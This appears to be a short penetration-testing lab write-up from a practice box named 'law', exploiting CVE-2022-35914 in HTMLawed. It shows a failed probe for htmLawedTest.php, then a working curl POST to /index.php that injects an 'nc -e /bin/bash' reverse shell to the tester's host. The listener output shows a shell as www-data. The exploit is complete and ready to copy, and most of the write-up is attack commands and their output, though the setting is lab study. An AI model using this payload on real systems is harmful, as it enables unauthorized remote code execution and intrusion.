InfoSec LAB

law_Exploitation

Created: 2 min read

CVE-2022-35914

The target HTMLawed instance appears to be vulnerable to CVE-2022-35914

Initial Fail

Initial exploit attempts fails as the htmLawedTest.php file could not be located

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/law/CVE-2022-35914-poc]
└─$ curl -I http://$IP/htmLawedTest.php
HTTP/1.1 404 Not Found
Date: Mon, 24 Feb 2025 12:34:05 GMT
Server: Apache/2.4.56 (Debian)
Content-Type: text/html; charset=iso-8859-1

The htmLawedTest.php file doesn’t seem to exist

Workaround

However, it works when sending the POST request to the /index.php file. This seems to suggests that the htmLawedTest.php file was RENAMED to index.php

Exploitation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/law]
└─$ curl -s -d 'sid=foo&hhook=exec&text=/usr/bin/nc 192.168.45.203 9999 -e /bin/bash' -b 'sid=foo' http://$IP/index.php

Sending a reverse shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/law]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.203] from (UNKNOWN) [192.168.178.190] 33728
whoami
www-data
hostname
law
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:ac:be brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.178.190/24 brd 192.168.178.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:acbe/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via exploiting CVE-2022-35914

Interactive Graph View

Backlinks